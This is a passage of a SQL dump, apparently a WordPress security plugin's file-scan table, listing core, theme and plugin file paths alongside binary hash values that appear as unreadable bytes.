','wp-includes/wp-includes/css/dist/block-library/theme-rtl.css',0,'���Ԝ����p1l�','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('qh�665�y|�=�?S	','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('qj��O.C�ެИ}��','wp-includes/blocks/navigation-submenu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hKu&�\\��IOB��','i��^��2AQ�֯b�J�:��J�a���:�','',0,'?'),('q{n�/��0d����g','wp-content/plugins/wordpress-seo/css/dist/icons-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\n�Nmm�^N�󵂡&','���<!�0{b2��Ņ���N���n���B','',0,'?'),('q�߶�U�q�bS�\n-��','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��Ф�\\0�	�d','UETW2?a]�-�8A	˩\"Ầa�Y(�W','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','։�⭫2k%]m�,�%','4��R:���T��!�U~r{\ZIH��h����','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�ڀ\"NkvR	ތ6\Z','wp-content/plugins/disable-gutenberg/inc/plugin-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XV%&Ӱ!�4q��@�D','�V��>VT�h�C��b(��J��-5�f�o�','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�����WE[x�dH','y�pY��U����f����\0�z��,�^��~','',0,'?'),('q��Z�\0=s�\r��\r�','wp-includes/blocks/text-columns/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{C��eN|��sz<��','�NG��y����	�y�*�~ڰ|g=����','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<_-G\n�@�l3','�;���D^V�\'/qR��}�;5��HZ�7��','',0,'?'),('q��0#�$�/��qh\n','wp-content/plugins/wordpress-seo/src/helpers/wincher-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`jUԘ�溟�D�)��^','���h�79�_�h�B+}��:׷d: 4%`O���','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x	��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('q�C�IV�g�e�,1�','wp-includes/css/dist/block-library/editor-elements.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���tf/V�>t','�o��T���Q��bj�m�cw��\"�;J�$�\n�x�','',0,'?'),('q���}ܟ����f��>C','wp-content/plugins/redirection/redirection-capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9G#�tT�W�����6','@�.p�x�K�iW�\\�N�~�I�����$��','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�,���NͰ��|ߴ�c','g�	������d��1&9���-1�_����̓@','',0,'?'),('r��z\'��~��\n���','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/css/notice.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZF�k���ظ�����','=J<��Ӕ�e�Jda�2e���i�wB��','',0,'?'),('r���\"��%1�}/2Y�','wp-includes/blocks/pullquote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1<���(��4�','��`��Ѱw��i��=���,��[N�*W�dUW','',0,'?'),('rt5Z0���P\\��~','wp-content/plugins/wordpress-seo/admin/class-product-upsell-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','on��I�*��*[^\n�B','�heB�P�p��e�*g��V�7�<���','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('r3\0��=��\r�jB�Z','wp-includes/js/dist/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��m�s�F��%^�','W,�Hp�	>��UQ\r�V��D�d⩋�Z@o��','',0,'?'),('r:��U�j�3N��6��','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',0,'���DBSq&a��_�%','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	n�{���\0�0U$��','G\n��Ks��I\'��my9\ZV��D\\:�ć�','',0,'?'),('rhVf&�Pt��瞶�','wp-includes/wp-includes/widgets/class-wp-widget-media-image.php',0,'�dCa�*C^e~OriA�','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('rs���̌�u}���T','wp-content/plugins/wp-smushit/app/assets/images/smush-webp-test.png.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�Z?�4;ok�Ŷ�9','g�\"B�<�qL�*Z�l��#Ɠ3� ���@u�b��','',0,'?'),('rt�IŒg[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('rz\0rݡ�\"f/�AKI','wp-includes/wp-includes/js/mediaelement/mejs-controls.png',0,'�.۷Z#e0�<�l���','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('r}q��2�u��z�5�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerAwareTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`.Z���G��y!','61�!2�e-QYcL���-|-;G��:�@�','',0,'?'),('r�����Y��\nn��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ko.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�G5�`픉fS%��','[�X�`5rQL�����&�\"�z�Jqŝ9X=e','',0,'?'),('r��,e���������','wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js',0,'��KaJ�d���J\'^','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�q�i�������','ϑ�톳dJ6�k�E?�$�	��H�kd�ô','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UM�ĉycm�q\n<_�','k���E���[r7гp�s#P�gp��`�ڸ��','',0,'?'),('r�$W��3�+�Y�]��','wp-content/plugins/wordpress-seo/js/dist/externals/propTypes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�l�>U���U���8�','|������\r��r-��R,��+�G����M','',0,'?'),('r�aͬ�\Z����2�^�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-description.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Zz�zÔ}����*�','�t��R��T8}�pQ`��)Ɏ񗉭!���e','',0,'?'),('r����&E��eD�q','wp-includes/blocks/social-links/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ag���Y��\"<��x�','� ��K��f=]�pS�)\n>?��τX��V�]�.�','',0,'?'),('r��9��;‚j��|','wp-includes/wp-includes/js/dist/dom.min.js',0,'���k��\"���MM�','���k��\"���MM�','D�I�&�\"�H��-���Q࣋�Fzֱ�ev�','',0,'?'),('r�\n�����s�','wp-includes/wp-includes/sodium_compat/lib/namespaced.php',0,'01����vnG��\r�','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('r�S(��hN��+�$g�','wp-content/plugins/wp-smushit/app/assets/images/dev-team.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�RIy��gW,any�','���gEQ�Zr�b��4���.��A�*Q���','',0,'?'),('r�����q�/4g��B�','wp-includes/wp-includes/images/w-logo-blue-white-bg.png',0,'\0�Ȉk�|�Ѽ���','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('r��nz\0`�]�e�#+t','wp-includes/blocks/comments-pagination-previous/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�6z�AG���d','�lݍ�����7�t�.J�kd���jc)�	�','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�Կ 6l�c�3�','�r�@4rE�y���������.���ME��ɷ','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('r�jN�mM.s�d���F�','wp-content/plugins/redirection/matches/cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڤ������f�\n�N9�','4��@�~�@�@3�Ŝ�\"�LC�<l�%�*�','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ͽ�V`�%����','�	���Pr.�\Z���g��wGR��P��|x���4','',0,'?'),('r��h^���g�=��','wp-includes/blocks/embed/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߫D�L򊹀�)\r','�l�0�f��6�!�2��C��\n���\'JǨ�Њ','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޡ�CcǙ�L�ޥO�','l�� �P��4#A(�<n��]}	�','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����9l\nXQ�0h�Q*','�Ź���YZ/����+`�_{�T��n��H�','',0,'?'),('r������*��-(','wp-content/plugins/wordpress-seo/inc/class-my-yoast-api-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m6� U�lS�`','��(�¿�������G�\"�-\Z���L�h ��9 ','',0,'?'),('s���`�p����\\','wp-content/plugins/wp-cerber/assets/flags/sd.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r:�\n�ݯ�E1sh','�f�!���ܵf�~.\r��I;/p�W,Lg,','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('s\Z�Pׅev��BǴ�','wp-content/plugins/wordpress-seo/src/conditionals/no-tool-selected-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�Rr�{B���\r��','r��>�G�����6�u$��Y �+5�,2]�','',0,'?'),('s��(�=3*�9	','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3	�:h)�7K�<�\\N�+','',0,'?'),('s>x�〨I��9-]6T','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/js/notice.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/(\\�m��C?�m�','`$�����F���C)o��Ĕ���g%۱��[','',0,'?'),('s?=���M#�(r�%�','wp-content/plugins/wp-cerber/assets/flags/jm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���#\".~�!Ϯ��z�','&�O�c��&28t~A�g�|az*�u��g%�JX','',0,'?'),('sD������I6��|U�_','wp-includes/blocks/post-template/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}-����?�����ng','��S���5�D�hm�ɲ�Ė��-o%3�-�>','',0,'?'),('sL�Y���C��a�','wp-includes/blocks/embed/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��e��L��p�Z�l','r�mU0u��p����P���$}U��드j��d[','',0,'?'),('saO�Y�,~r�൭k�','wp-includes/blocks/search/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','о8�Q������$','�&�b��X� �t爭��-(^���9F���@{�','',0,'?'),('sjt�\n�V�� ��(','wp-includes/wp-includes/js/wp-emoji.min.js',0,'+g�D>�w�f�م*�D','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('s���h���\r��?b0$�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/NoSeekStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݳ���i-\rq���H�s','�>Y��-��3s��\'~�ѱ�Q��\\��0','',0,'?'),('s�\"L���8/l��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�\'��#�a�Ȟ�h','�Be��S`>�t-��p�@�s���x1�\Z�vm','',0,'?'),('s��K,f���\\��','wp-content/plugins/wordpress-seo/admin/services/class-file-size.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l [_�=oK��F#;','x_vw���?r~���x?�}�p��n��TI7k','',0,'?'),('s��[B����lE���','wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js',0,'�*NȒmQ������','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'T1����l�AU��','.l�4�Z���eI#m���E�������GC�','',0,'?'),('s�uĸ��_��Rv4','wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js',0,'�J����p�°�5Q�','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('s����Y�\'�N|��)','wp-includes/wp-includes/js/jquery/jquery.min.js',0,'��	3i��7�L�1�<','��	3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('sՉ���m����LV�3�','wp-includes/wp-includes/js/dist/vendor/react.js',0,'��d:�K��D��,$','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('s�0yl�ꃋD\\��\"','wp-content/plugins/wordpress-seo/wp-seo-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dR*/��>9���¯�',';g{Z�iJ�m��C��s.t�¾,V�l�k�3','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s��c�z7�߄��','wp-content/plugins/wp-fastest-cache/images/stackpath.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؿH��(\03���','-���B1q��\'���d�ju�R4d9�ى','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Z�#�*���A��','.\"T3�$\0���T�j����/ �C��ǻ�@��','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�ԧ��(��0(y','��Ij��6ʄ�{��鈊��\"�	Ԯi�6ǭ','',0,'?'),('s��j\'H]�{4^���','wp-content/plugins/wordpress-seo/src/integrations/blocks/block-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҿ��g_Bv �+{�=)','��F1/3.�3�oSI��l3x���-m���','',0,'?'),('t	�U� iާ�\"��s�','wp-includes/blocks/buttons/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Y����g/�h�','���)���CS�&~��H�ޟ=Fm:�\\5\"','',0,'?'),('t ~@r���.W�8_','wp-includes/blocks/avatar/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b,��=���.���5','%����^��Mk���^hiw5O�6��$�!}','',0,'?'),('t,���Ǟ+N:�c6`','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/bg.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#?i��¯1��O9Qw','�H�誗7\n�;Z���|�}�7o���.k.�s:\r��','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǩ��.������l','��k��uX�x�^-�b\Z��r�P�^Ί��Mi�','',0,'?'),('t/���4�YK@����gm','wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',0,'Q�$������42��','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('t5^	kS(1��z�G^��','wp-includes/blocks/archives/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MI�/V�XQ��j*','�f��>�َ_^�U�;/�\\_0���!o�cy','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ch�P����P\rDW','��)� ��$K�8�v3��X&�okv���','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('tFS}m��JT�`@��-','wp-includes/wp-includes/js/media-models.min.js',0,'Ӷsj�~�MP����+','Ӷsj�~�MP����+','���7��}Z��9��ڜ<r���kV~��','',0,'?'),('tG�/�Ȇ��z��U[�','wp-content/plugins/wp-fastest-cache/js/lang/ja.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4��H|:$&h�W%','?�!Ri�\'�Aj�Y�;�f�o$�*۱!nϠot��+','',0,'?'),('tH��l��6u���g��','wp-content/themes/hitmag/inc/kirki/deprecated/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H(�U|�%�+1C','WLK<\nj��A1a�aA*��+x8M%!dQH)h�','',0,'?'),('tM7U���>�k�=��(','wp-content/plugins/wp-smushit/app/class-media-library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�Y�dB\n�U /<�','?M��i�h���џA�yp�4�	� X\0��E��','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�6����b�X�+M\'','n@���to�:��\\�e!65��,K�V\\=','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('ta�;_Y\np�=[_:B��','wp-content/plugins/wordfence/images/icons/check.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DF������P�L','���+��ʣ�фȯ��?��+�\0_�ŴQq�','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w\"��9��E��ٕ��','��_��	Rя=��i��xt��$[��S�X�h�','',0,'?'),('tm�\n��GO	\'�\Z޵','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�\"k_�BZ�B��WVV�','��Ia1�q�\0��/9�H��:\ZfQ@�f\\3g���2','',0,'?'),('t}��\"��X�T���$m','wp-content/plugins/wp-smushit/app/assets/fonts/smush-graphic-dashboard-summary.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3��<ɃY*��dD','�\'Y��3�|�[�@��m���]b�z��E�H<','',0,'?'),('t�����.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�\"�?$b[ŁD�_','X��%B{�0�y2�|�k�TU�gm����#�Y','',0,'?'),('t���a�8���W��58','wp-content/plugins/wp-fastest-cache/inc/cdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�2��#k��SK','/{��Y������L�;6{�o���UeoM','',0,'?'),('t���R��OLZ����\'','wp-includes/blocks/query/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���c;@���i�v�q�','��7�8N)\"�y	����ĕq��E�@','',0,'?'),('t�dy�H\nc��Ip��','wp-content/plugins/wordpress-seo/src/config/migrations/20200428194858_ExpandIndexableColumnLengths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���u��9},Ӓ�','!��]\Z�p�q�ޕkg�-;���2 N?{�','',0,'?'),('t�}jl�U����)@�u','wp-includes/css/dist/edit-site/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5F#۔R�%\"L͟','5��6��;m{Pr���נ��vl�vr���(�','',0,'?'),('t�\'��/�\nh�{\0#�','wp-content/plugins/wordfence/css/jquery-ui.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('t�����#���~�Grƒ','wp-includes/wp-includes/widgets/class-wp-widget-categories.php',0,'Bb��w�8�[�&�-Y','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('t��T�U�1��{��','wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php',0,'��Hx+�07��`�}�','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('t��\0a��\\��_\'W�','wp-includes/blocks/table/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c6T���H��	_\0M','�2\0g�d�`�=%�F�M�~�r-�.���\n�j','',0,'?'),('t�Z����$9~�rAM','wp-content/plugins/wordpress-seo/src/config/schema-ids.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RT�����a|�','���\0��6P!�-�.��?�ͯU8��*]\Z��3','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N	�\'G','�fX��RZ�|:O�b��=f�[y���5 ~	','',0,'?'),('utC�f��IP����','wp-includes/wp-includes/class-walker-category.php',0,')��2�G�E����;H�',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('u\n/�1xZ1a�3q�','wp-content/plugins/wp-cerber/assets/flags/cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�}���]K���','N��F�\r�(6M�y��Ŝ�{;/�����M�z','',0,'?'),('u)�!̧�X�����','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��(�;	�5t�/','6�6s#Sx�_�	f���rC���6���w�9�','',0,'?'),('u�T�ڃ�@.W�2|4','wp-includes/wp-includes/class-wp-image-editor-imagick.php',0,'�U��--��	�2��6','�U��--��	�2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��]�>e�\n(40','r��*%���P��2I��7�\Z�K�aq#�','',0,'?'),('u)z�Z��hL�P�|�','wp-includes/blocks/spacer/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)vwA�r��4֥�\\','aʴ�-%M�\'�Sm�]�s����Z�\0C�-','',0,'?'),('u2]�Kv�\0ݦ\rtP','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt-BR.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\Z���\"k	���<�','�\'�z������V�\"�5Y\']ώeǞ�����@}^�','',0,'?'),('u>]\0aO<�G:�5�Z�','wp-includes/blocks/latest-posts/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8m�	x�#�\0��Yt�','��|��A?\\z8�e�o���$J�S2P�)��](','',0,'?'),('uIh=[�6ozV�I�,߬','wp-content/plugins/wordfence/css/phpinfo.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('uK˒2(_u��B\r���','wp-includes/wp-includes/js/jquery/jquery-migrate.js',0,'�\0�6��?ٳ��t�\r','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('uV�И��$|�����','wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�yQs /�d+�%�G','��3�`pf��qu�#�\Z\"����x=��}^�','',0,'?'),('u^��A��A��p[��V','wp-content/plugins/wordpress-seo/src/services/health-check/report-builder-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��L`;\Zx�/���','5\r�\n*	b��?���آश�%C��خ�#�','',0,'?'),('uapF��[t#��(q[','wp-content/plugins/wordpress-seo/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('ue�,\"\n	�h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&��΁�����������s-�','',0,'?'),('u{�����\0�D㿰�','wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/failed-storage-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��K=�x��Y[��','���0gA�>|��#T�+X=�}Tl{�ة���','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#g�x��@�o�TM�','���ee�6s���-�-I�$�Q�¼@ٍy��','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L